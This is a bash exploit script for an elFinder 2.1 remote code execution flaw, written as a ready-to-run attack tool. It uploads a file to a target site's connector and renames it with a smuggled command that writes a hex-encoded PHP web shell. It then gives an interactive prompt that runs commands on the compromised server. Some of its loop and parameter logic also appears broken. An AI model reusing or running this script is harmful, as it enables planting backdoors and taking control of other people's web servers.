Elfinder 2.1 Remote Code Execution

1. #!/bin/bash
2. #Elfinder 2.1 Remote Code Execution
3. #By LittleJok3r - @d3pTeam - Maxteroit
4. #Sorry if this tool bad :(
5. #out = keluar
6. site=$1
7. if [[ $(curl -s $site/php/connector.minimal.php | grep -o 'errUnknownCmd') =~ 'errUnknownCmd' ]];
8.   then
9.   echo "site Looking Vulnerability"
10.    if [[ $(curl -s -F "reqid=1693222c439f4" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1497726174" -F "upload[]=@evil.jpg" $site/php/connector.minimal.php | grep -o 'l1_ZXZpbC5qcGc') =~ 'l1_ZXZpbC5qcGc' ]];
11.      then
12.        echo "Success Uploading !!!"
13.          if [[ $(curl -s -d "cmd=rename" -d "target=l1_ZXZpbC5qcGc" -d "name=evil.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > evil.php;echo evil.jpg" $site/php/connector.minimal.php | grep -o 'l1_ZXZpbC5qcGc7ZWNobyAzYzNmNzA2ODcwMjA3Mzc5NzM3NDY1NmQyODI0NWY0NzQ1NTQ1YjIyNjMyMjVkMjkzYjIwM2YzZTBhIHwgeHhkIC1yIC1wID4gZXZpbC5waHA7ZWNobyBldmlsLmpwZw') =~ 'l1_ZXZpbC5qcGc7ZWNobyAzYzNmNzA2ODcwMjA3Mzc5NzM3NDY1NmQyODI0NWY0NzQ1NTQ1YjIyNjMyMjVkMjkzYjIwM2YzZTBhIHwgeHhkIC1yIC1wID4gZXZpbC5waHA7ZWNobyBldmlsLmpwZw' ]];
14.            then
15.              echo "Success Rename File!!!"
16.               echo "Your Target Look good"
17.                 if [[ $(curl -s "$site/php/connector.minimal.php?target=l1_ZXZpbC5qcGc7ZWNobyAzYzNmNzA2ODcwMjA3Mzc5NzM3NDY1NmQyODI0NWY0NzQ1NTQ1YjIyNjMyMjVkMjkzYjIwM2YzZTBhIHwgeHhkIC1yIC1wID4gZXZpbC5waHA7ZWNobyBldmlsLmpwZw&width=539&height=960&degree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" | grep -o 'errResize') =~ 'errResize' ]];
18.                     then
19.                       echo "please wait"
20.                         if [[ $(curl -s $site/php/evil.php | grep -o 'GIF89a;') =~ 'GIF89a;' ]];
21.                           then
22.                            echo "success exploit!!!"
23.                             read -p "root@exploit : " rce
24.                              for eks in rce; do
25.                               ngewe=$(curl -s "$site/php/evil.php?cmd=$eks")
26.                               echo "$ngewe"
27.                                 if [[ $eks =~ 'keluar' ]];
28.                                 then
29.                                  break
30.                               else
31.                                  break
32.                               fi
33.                              done
34.                             else
35.                           echo "Shell Not Found :("
36.                          echo "Rename File Again"
37.                          if [[ $(curl -s -d "cmd=rename" -d "target=l1_ZXZpbC5qcGc7ZWNobyAzYzNmNzA2ODcwMjA3Mzc5NzM3NDY1NmQyODI0NWY0NzQ1NTQ1YjIyNjMyMjVkMjkzYjIwM2YzZTBhIHwgeHhkIC1yIC1wID4gZXZpbC5waHA7ZWNobyBldmlsLmpwZw" -d "name=evil.php.pjpg" $site/php/connector.minimal.php | grep -o 'removed') =~ 'removed' ]];
38.                          then
39.                         printf "Success Rename!!!\nTry Execution Shell\n"
40.                     read -p "root@exploit : " rce1
41.                     for ekse in rce1; do
42.                        if [[ $ekse =~ 'keluar' ]];
43.                       then
44.                       break
45.                       else
46.                       coli=$(curl -s "$site/php/evil.php.pjpg?cmd=$ekse")
47.                         echo "$coli"
48.                       fi
49.                      done
50.                      else
51.                     echo "still sad :("
52.                    fi
53.                 fi
54.                else
55.               echo "Failed Execution :("
56.              fi
57.             else
58.           echo "Failed Rename :("
59.          fi
60.         else
61.       echo "Failed Upload Backdoor"
62.     fi
63.   else
64.  echo "Site Not Vulnerable"
65. fi